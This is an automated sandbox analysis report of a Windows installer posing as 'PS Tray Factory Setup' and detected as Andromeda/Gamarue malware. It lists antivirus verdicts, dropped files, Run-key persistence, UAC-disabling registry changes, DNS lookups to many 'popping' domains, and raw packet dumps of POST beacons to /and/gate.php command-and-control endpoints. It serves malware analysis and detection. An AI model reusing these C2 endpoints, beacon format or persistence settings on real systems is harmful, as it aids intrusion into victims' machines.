Analysis Date2015-05-01 05:10:50
MD575dcd4348a88b811bf6dc5eb06f6438e
SHA197d474d39e17005281e7b8eba0ef40ce0db0678f

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 92032f5e50e74fe0fe80a33ba4ca92db sha1: 4ccbaddbb239a58e04ea02027b171f35e16dfb12 size: 23552
Section.rdata md5: 5801d712ecba58aa87d1e7d1aa24f3aa sha1: 0ec4a63131e982d6c2f062510def1c9cc9289b04 size: 4608
Section.data md5: f2470ac8847791744aff280e7e2f5353 sha1: 8d1d071e3f45ba87014fced1f57d807c0ccb6577 size: 1024
Section.ndata md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rsrc md5: daf402792775807c51bb0c669fd8e614 sha1: 7a4e5df23b9fe8b097a9cdb34287f847bb0b31ff size: 10752
Timestamp2014-10-07 04:40:17
VersionLegalCopyright:
FileVersion: 8.4.4.5
CompanyName: PS Soft Lab
ProductName: PS Tray Factory
ProductVersion: 8.4.4.5
FileDescription: PS Tray Factory Setup
PackerNullsoft PiMP Stub -> SFX
PEhash6d72fc3af1e51f105e2a75a2042fb26a02a3ea00
IMPhash59a4a44a250c4cf4f2d9de2b3fe5d95f
AVAd-AwareTrojan.GenericKD.2117158
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)Trojan.GenericKD.2117158
AVAuthentiumW32/Zbot.IZNZ-0912
AVAvira (antivir)TR/Gamarue.A.1137
AVBitDefenderTrojan.GenericKD.2117158
AVBullGuardTrojan.GenericKD.2117158
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Backdoor.Androm.r5
AVClamAVno_virus
AVDr. WebBackDoor.Andromeda.404
AVEmsisoftTrojan.GenericKD.2117158
AVEset (nod32)Win32/Injector.BTMD
AVFortinetW32/BTMD!tr
AVFrisk (f-prot)W32/Zbot.CNZ
AVF-Secureno_virus
AVGrisoft (avg)Inject2.BMTR
AVIkarusTrojan.Win32.Injector
AVK7no_virus
AVKasperskyBackdoor.Win32.Androm.gczl
AVMalwareBytesTrojan.ZBAgent.NS
AVMcafeeRDN/Generic BackDoor!bbp
AVMicrosoft Security EssentialsWorm:Win32/Gamarue
AVMicroWorld (escan)Trojan.GenericKD.2117158[ZP]
AVPadvishno_virus
AVRisingno_virus
AVSophosno_virus
AVSymantecTrojan.Gen.2
AVTrend Microno_virus
AVTwisterno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\03 Speed The Collapse.mp3
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsd3.tmp\motorbicycles.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nst2.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsd3.tmp\motorbicycles.dll
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsd3.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsy1.tmp
Creates ProcessC:\malware.exe

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\system32\msiexec.exe
Creates ProcessC:\WINDOWS\system32\msiexec.exe

Process
↳ C:\WINDOWS\system32\msiexec.exe

RegistryHKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\Explorer\TaskbarNoNotification ➝
NULL
RegistryHKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Policies\Explorer\Run\4033585203 ➝
C:\Documents and Settings\All Users\msrhmucm.exe\\x00
RegistryHKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\advanced\ShowSuperHidden ➝
NULL
RegistryHKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system\EnableLUA ➝
NULL
RegistryHKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\Explorer\TaskbarNoNotification ➝
NULL
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Winsock DNSpoppin32.info
Winsock DNSpopping45.com
Winsock DNSpoppingj.com
Winsock DNSpoppingd.info
Winsock DNSpoppingk.com
Winsock DNSpoppingh.com
Winsock DNSpoppinge.info
Winsock DNSpopping33.org
Winsock DNSpoppingb.com
Winsock DNSpoppin22.com
Winsock DNSpoppinga.com
Winsock DNSpoppingx.com
Winsock DNSpoppingc.info
Winsock DNSpoppingg.com
Winsock DNSpoppingi.com
Winsock DNSpopping678.org
Winsock DNSpoppin33.com
Winsock DNSpoping45.info
Winsock DNSpoppingf.com
Winsock DNSpoppingma.com

Process
↳ C:\WINDOWS\system32\msiexec.exe

Process
↳ C:\WINDOWS\Explorer.EXE

Network Details:

DNSwww.update.microsoft.com.nsatc.net
Type: A
191.232.80.55
DNSwww.update.microsoft.com.nsatc.net
Type: A
134.170.58.221
DNSpoppinga.com
Type: A
69.89.25.171
DNSpoppingd.info
Type: A
166.78.144.80
DNSpoppingf.com
Type: A
217.160.165.207
DNS888950.parkingcrew.net
Type: A
54.72.9.51
DNSpoppingh.com
Type: A
173.255.206.248
DNSpoppingj.com
Type: A
192.0.78.24
DNSpoppingj.com
Type: A
192.0.78.25
DNS888950.parkingcrew.net
Type: A
54.72.9.51
DNSpoppin33.com
Type: A
173.255.206.248
DNSpopping33.org
Type: A
173.255.206.248
DNSpopping45.com
Type: A
173.255.206.248
DNSupdate.microsoft.com
Type: A
DNSpoppingx.com
Type: A
DNSpoppingc.info
Type: A
DNSpoppingb.com
Type: A
DNSpoppinge.info
Type: A
DNSpoppingg.com
Type: A
DNSpoping45.info
Type: A
DNSpoppingi.com
Type: A
DNSpoppingk.com
Type: A
DNSpopping678.org
Type: A
DNSpoppingma.com
Type: A
DNSpoppin32.info
Type: A
DNSpoppin22.com
Type: A
HTTP POSThttp://poppinga.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POSThttp://poppingd.info/and/gate.php
User-Agent: Mozilla/4.0
HTTP POSThttp://poppingf.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POSThttp://poppingg.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POSThttp://poppingh.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POSThttp://poppingj.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POSThttp://poppingk.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POSThttp://poppin33.com/and/gate.php
User-Agent: Mozilla/4.0
HTTP POSThttp://popping33.org/and/gate.php
User-Agent: Mozilla/4.0
HTTP POSThttp://popping45.com/and/gate.php
User-Agent: Mozilla/4.0
Flows UDP192.168.1.1:1036 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1037 ➝ 191.232.80.55:80
Flows UDP192.168.1.1:1038 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1039 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1040 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1041 ➝ 69.89.25.171:80
Flows UDP192.168.1.1:1042 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1043 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1044 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1045 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1046 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1047 ➝ 166.78.144.80:80
Flows UDP192.168.1.1:1048 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1049 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1050 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1051 ➝ 217.160.165.207:80
Flows UDP192.168.1.1:1052 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1053 ➝ 54.72.9.51:80
Flows UDP192.168.1.1:1054 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1055 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1056 ➝ 173.255.206.248:80
Flows UDP192.168.1.1:1057 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1058 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1059 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1060 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1061 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1062 ➝ 192.0.78.24:80
Flows UDP192.168.1.1:1063 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1064 ➝ 54.72.9.51:80
Flows UDP192.168.1.1:1065 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1066 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1067 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1068 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1069 ➝ 173.255.206.248:80
Flows UDP192.168.1.1:1070 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1071 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1072 ➝ 173.255.206.248:80
Flows UDP192.168.1.1:1073 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1074 ➝ 8.8.4.4:53
Flows TCP192.168.1.1:1075 ➝ 173.255.206.248:80
Flows UDP192.168.1.1:1076 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1077 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1078 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1079 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1080 ➝ 8.8.4.4:53
Flows UDP192.168.1.1:1081 ➝ 8.8.4.4:53

Raw Pcap
0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   706f7070 696e6761 2e636f6d 0d0a436f   poppinga.com..Co
0x00000090 (00144)   6e74656e 742d4c65 6e677468 3a203734   ntent-Length: 74
0x000000a0 (00160)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000b0 (00176)   206e6f2d 63616368 650d0a50 7261676d    no-cache..Pragm
0x000000c0 (00192)   613a206e 6f2d6361 6368650d 0a0d0a6b   a: no-cache....k
0x000000d0 (00208)   515a6642 574e612b 4a646135 58313448   QZfBWNa+Jda5X14H
0x000000e0 (00224)   6e6e4f36 72646267 555a484e 6e372f50   nnO6rdbgUZHNn7/P
0x000000f0 (00240)   35326462 67766e50 6449724d 4f497347   52dbgvnPdIrMOIsG
0x00000100 (00256)   6a562b39 6d33536a 68534250 666d380a   jV+9m3SjhSBPfm8.
0x00000110 (00272)   4c563631 446b343d 0a                  LV61Dk4=.

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   706f7070 696e6764 2e696e66 6f0d0a43   poppingd.info..C
0x00000090 (00144)   6f6e7465 6e742d4c 656e6774 683a2037   ontent-Length: 7
0x000000a0 (00160)   340d0a43 61636865 2d436f6e 74726f6c   4..Cache-Control
0x000000b0 (00176)   3a206e6f 2d636163 68650d0a 50726167   : no-cache..Prag
0x000000c0 (00192)   6d613a20 6e6f2d63 61636865 0d0a0d0a   ma: no-cache....
0x000000d0 (00208)   6b515a66 42574e61 2b4a6461 35583134   kQZfBWNa+Jda5X14
0x000000e0 (00224)   486e6e4f 36726462 67555a48 4e6e372f   HnnO6rdbgUZHNn7/
0x000000f0 (00240)   50353264 6267766e 50644972 4d4f4973   P52dbgvnPdIrMOIs
0x00000100 (00256)   476a562b 396d3353 6a685342 50666d38   GjV+9m3SjhSBPfm8
0x00000110 (00272)   0a4c5636 31446b34 3d0a                .LV61Dk4=.

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   706f7070 696e6766 2e636f6d 0d0a436f   poppingf.com..Co
0x00000090 (00144)   6e74656e 742d4c65 6e677468 3a203734   ntent-Length: 74
0x000000a0 (00160)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000b0 (00176)   206e6f2d 63616368 650d0a50 7261676d    no-cache..Pragm
0x000000c0 (00192)   613a206e 6f2d6361 6368650d 0a0d0a6b   a: no-cache....k
0x000000d0 (00208)   515a6642 574e612b 4a646135 58313448   QZfBWNa+Jda5X14H
0x000000e0 (00224)   6e6e4f36 72646267 555a484e 6e372f50   nnO6rdbgUZHNn7/P
0x000000f0 (00240)   35326462 67766e50 6449724d 4f497347   52dbgvnPdIrMOIsG
0x00000100 (00256)   6a562b39 6d33536a 68534250 666d380a   jV+9m3SjhSBPfm8.
0x00000110 (00272)   4c563631 446b343d 0a0a                LV61Dk4=..

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   706f7070 696e6767 2e636f6d 0d0a436f   poppingg.com..Co
0x00000090 (00144)   6e74656e 742d4c65 6e677468 3a203734   ntent-Length: 74
0x000000a0 (00160)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000b0 (00176)   206e6f2d 63616368 650d0a50 7261676d    no-cache..Pragm
0x000000c0 (00192)   613a206e 6f2d6361 6368650d 0a0d0a6b   a: no-cache....k
0x000000d0 (00208)   515a6642 574e612b 4a646135 58313448   QZfBWNa+Jda5X14H
0x000000e0 (00224)   6e6e4f36 72646267 555a484e 6e372f50   nnO6rdbgUZHNn7/P
0x000000f0 (00240)   35326462 67766e50 6449724d 4f497347   52dbgvnPdIrMOIsG
0x00000100 (00256)   6a562b39 6d33536a 68534250 666d380a   jV+9m3SjhSBPfm8.
0x00000110 (00272)   4c563631 446b343d 0a0a                LV61Dk4=..

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   706f7070 696e6768 2e636f6d 0d0a436f   poppingh.com..Co
0x00000090 (00144)   6e74656e 742d4c65 6e677468 3a203734   ntent-Length: 74
0x000000a0 (00160)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000b0 (00176)   206e6f2d 63616368 650d0a50 7261676d    no-cache..Pragm
0x000000c0 (00192)   613a206e 6f2d6361 6368650d 0a0d0a6b   a: no-cache....k
0x000000d0 (00208)   515a6642 574e612b 4a646135 58313448   QZfBWNa+Jda5X14H
0x000000e0 (00224)   6e6e4f36 72646267 555a484e 6e372f50   nnO6rdbgUZHNn7/P
0x000000f0 (00240)   35326462 67766e50 6449724d 4f497347   52dbgvnPdIrMOIsG
0x00000100 (00256)   6a562b39 6d33536a 68534250 666d380a   jV+9m3SjhSBPfm8.
0x00000110 (00272)   4c563631 446b343d 0a0a                LV61Dk4=..

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   706f7070 696e676a 2e636f6d 0d0a436f   poppingj.com..Co
0x00000090 (00144)   6e74656e 742d4c65 6e677468 3a203734   ntent-Length: 74
0x000000a0 (00160)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000b0 (00176)   206e6f2d 63616368 650d0a50 7261676d    no-cache..Pragm
0x000000c0 (00192)   613a206e 6f2d6361 6368650d 0a0d0a6b   a: no-cache....k
0x000000d0 (00208)   515a6642 574e612b 4a646135 58313448   QZfBWNa+Jda5X14H
0x000000e0 (00224)   6e6e4f36 72646267 555a484e 6e372f50   nnO6rdbgUZHNn7/P
0x000000f0 (00240)   35326462 67766e50 6449724d 4f497347   52dbgvnPdIrMOIsG
0x00000100 (00256)   6a562b39 6d33536a 68534250 666d380a   jV+9m3SjhSBPfm8.
0x00000110 (00272)   4c563631 446b343d 0a0a                LV61Dk4=..

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   706f7070 696e676b 2e636f6d 0d0a436f   poppingk.com..Co
0x00000090 (00144)   6e74656e 742d4c65 6e677468 3a203734   ntent-Length: 74
0x000000a0 (00160)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000b0 (00176)   206e6f2d 63616368 650d0a50 7261676d    no-cache..Pragm
0x000000c0 (00192)   613a206e 6f2d6361 6368650d 0a0d0a6b   a: no-cache....k
0x000000d0 (00208)   515a6642 574e612b 4a646135 58313448   QZfBWNa+Jda5X14H
0x000000e0 (00224)   6e6e4f36 72646267 555a484e 6e372f50   nnO6rdbgUZHNn7/P
0x000000f0 (00240)   35326462 67766e50 6449724d 4f497347   52dbgvnPdIrMOIsG
0x00000100 (00256)   6a562b39 6d33536a 68534250 666d380a   jV+9m3SjhSBPfm8.
0x00000110 (00272)   4c563631 446b343d 0a0a                LV61Dk4=..

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   706f7070 696e3333 2e636f6d 0d0a436f   poppin33.com..Co
0x00000090 (00144)   6e74656e 742d4c65 6e677468 3a203734   ntent-Length: 74
0x000000a0 (00160)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x000000b0 (00176)   206e6f2d 63616368 650d0a50 7261676d    no-cache..Pragm
0x000000c0 (00192)   613a206e 6f2d6361 6368650d 0a0d0a6b   a: no-cache....k
0x000000d0 (00208)   515a6642 574e612b 4a646135 58313448   QZfBWNa+Jda5X14H
0x000000e0 (00224)   6e6e4f36 72646267 555a484e 6e372f50   nnO6rdbgUZHNn7/P
0x000000f0 (00240)   35326462 67766e50 6449724d 4f497347   52dbgvnPdIrMOIsG
0x00000100 (00256)   6a562b39 6d33536a 68534250 666d380a   jV+9m3SjhSBPfm8.
0x00000110 (00272)   4c563631 446b343d 0a0a                LV61Dk4=..

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   706f7070 696e6733 332e6f72 670d0a43   popping33.org..C
0x00000090 (00144)   6f6e7465 6e742d4c 656e6774 683a2037   ontent-Length: 7
0x000000a0 (00160)   340d0a43 61636865 2d436f6e 74726f6c   4..Cache-Control
0x000000b0 (00176)   3a206e6f 2d636163 68650d0a 50726167   : no-cache..Prag
0x000000c0 (00192)   6d613a20 6e6f2d63 61636865 0d0a0d0a   ma: no-cache....
0x000000d0 (00208)   6b515a66 42574e61 2b4a6461 35583134   kQZfBWNa+Jda5X14
0x000000e0 (00224)   486e6e4f 36726462 67555a48 4e6e372f   HnnO6rdbgUZHNn7/
0x000000f0 (00240)   50353264 6267766e 50644972 4d4f4973   P52dbgvnPdIrMOIs
0x00000100 (00256)   476a562b 396d3353 6a685342 50666d38   GjV+9m3SjhSBPfm8
0x00000110 (00272)   0a4c5636 31446b34 3d0a                .LV61Dk4=.

0x00000000 (00000)   504f5354 202f616e 642f6761 74652e70   POST /and/gate.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a436f6e   hp HTTP/1.1..Con
0x00000020 (00032)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000030 (00048)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000040 (00064)   6d2d7572 6c656e63 6f646564 0d0a436f   m-urlencoded..Co
0x00000050 (00080)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 0d0a486f 73743a20   illa/4.0..Host: 
0x00000080 (00128)   706f7070 696e6734 352e636f 6d0d0a43   popping45.com..C
0x00000090 (00144)   6f6e7465 6e742d4c 656e6774 683a2037   ontent-Length: 7
0x000000a0 (00160)   340d0a43 61636865 2d436f6e 74726f6c   4..Cache-Control
0x000000b0 (00176)   3a206e6f 2d636163 68650d0a 50726167   : no-cache..Prag
0x000000c0 (00192)   6d613a20 6e6f2d63 61636865 0d0a0d0a   ma: no-cache....
0x000000d0 (00208)   6b515a66 42574e61 2b4a6461 35583134   kQZfBWNa+Jda5X14
0x000000e0 (00224)   486e6e4f 36726462 67555a48 4e6e372f   HnnO6rdbgUZHNn7/
0x000000f0 (00240)   50353264 6267766e 50644972 4d4f4973   P52dbgvnPdIrMOIs
0x00000100 (00256)   476a562b 396d3353 6a685342 50666d38   GjV+9m3SjhSBPfm8
0x00000110 (00272)   0a4c5636 31446b34 3d0a                .LV61Dk4=.


Strings
 " "0x\
lE
000004e4
8.4.4.5
CompanyName
FileDescription
FileVersion
LegalCopyright
msctls_progress32
MS Shell Dlg
ProductName
ProductVersion
PS Soft Lab
PS Tray Factory
PS Tray Factory Setup
StringFileInfo
SysListView32
Translation
VarFileInfo
VS_VERSION_INFO
*?|<>/":
0+n{0	
1V)DV+
2Av39O
2<@DvV"
2KTjEST
2 O3a{
2?_Q;d
2YS$Tx
3cVn(]
[42Z@l6
&47EXZ
4f]E@e]
^4Z"eE>
5HpgB5G
"5Ue4)g
6:(^	$E9
7!m@Y}
7_N=.&
8jg}FN
8KY}Rr
|`A#=6
AdjustTokenPrivileges
ADVAPI32
ADVAPI32.dll
anZjsd6
AppendMenuA
`AR0qw%i:
aV@#Ro1
*|-AX%
B)2^KFQ
b7W^1_
Bc"(ER
"b;"DE
BeginPaint
)BL8UM
b?UnVWNGk
B?u?vQ8
B#.WK7G
-|b`Zd
CallWindowProcA
CharNextA
CharPrevA
CheckDlgButton
 cLK]%Z
CloseClipboard
CloseHandle
CoCreateInstance
COMCTL32.dll
CompareFileTime
Control Panel\Desktop\ResourceLocale
CopyFileA
CoTaskMemFree
CreateBrushIndirect
CreateDialogParamA
CreateDirectoryA
CreateFileA
CreateFontIndirectA
CreatePopupMenu
CreateProcessA
CreateThread
CreateWindowExA
... %d%%
@.data
D$$+D$
D$,+D$$P
.DEFAULT\Control Panel\International
DefWindowProcA
DeleteFileA
DeleteObject
DestroyWindow
DialogBoxParamA
DispatchMessageA
;D"o#m
DrawTextA
D$,SPS
[E3j]M
e4bz0&
EmptyClipboard
EnableMenuItem
EnableWindow
EndDialog
EndPaint
Error launching installer
Error writing temporary file. Make sure your temp folder is valid.
ExitProcess
ExitWindowsEx
ExpandEnvironmentStringsA
e*Y(ye
f@c_`eI
fEP_CtEmL!
f#?hdfa
FillRect
FindClose
FindFirstFileA
FindNextFileA
FindWindowExA
Fj)1VY
fmmh=	
f_pY+xs#
FreeLibrary
,G8R{M2
G(c6P,
GDI32.dll
.geHTN
GetClassInfoA
GetClientRect
GetCommandLineA
GetCurrentProcess
GetDeviceCaps
GetDiskFreeSpaceA
GetDiskFreeSpaceExA
GetDlgItem
GetDlgItemTextA
GetExitCodeProcess
GetFileAttributesA
GetFileSize
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetFullPathNameA
GetLastError
GetMessagePos
GetModuleFileNameA
GetModuleHandleA
GetPrivateProfileStringA
GetProcAddress
GetShortPathNameA
GetSysColor
GetSystemDirectoryA
GetSystemMenu
GetSystemMetrics
GetTempFileNameA
GetTempPathA
GetTickCount
GetUserDefaultUILanguage
GetVersion
GetWindowLongA
GetWindowRect
GetWindowsDirectoryA
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
g_[P>Y	
gr+]K%
h5rW\\
hMYc#G/
http://nsis.sf.net/NSIS_Error
=i:(+}
<i}"e'
ImageList_AddMasked
ImageList_Create
ImageList_Destroy
incomplete download and damaged media. Contact the
InitiateShutdownA
Installer integrity check has failed. Common causes include
installer's author to obtain a new copy.
Instu_
InvalidateRect
iRichu
IsWindow
IsWindowEnabled
IsWindowVisible
iU)7`,O
jO<:ec
[jQ^L1
k$7)&r
KERNEL32
KERNEL32.dll
Kno_	T
L8<V0e
!*LA3H
Lb Y=a[
(L@=H=i
LmC"+S
LoadBitmapA
LoadCursorA
LoadImageA
LoadLibraryA
LoadLibraryExA
LookupPrivilegeValueA
LP}gd7*	
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
lZ^VrNM%
MessageBoxIndirectA
$$:	Mh
\Microsoft\Internet Explorer\Quick Launch
More information at:
MoveFileA
MoveFileExA
^M/t~K'EM
M="u^8K
MulDiv
MultiByteToWideChar
MWH8&%
 M)Xva
$+NA3G
.ndata
NSIS Error
~nsu.tmp
{nSxAEF
NullsoftInst
NulluM	E
NWG.[=l
.*n*:y
%-OA3H
#oC'kw
/->	Oj
ole32.dll
OleInitialize
OleUninitialize
OpenClipboard
OpenProcessToken
?P9EzI
pbKd `"b
PeekMessageA
?P=G}I
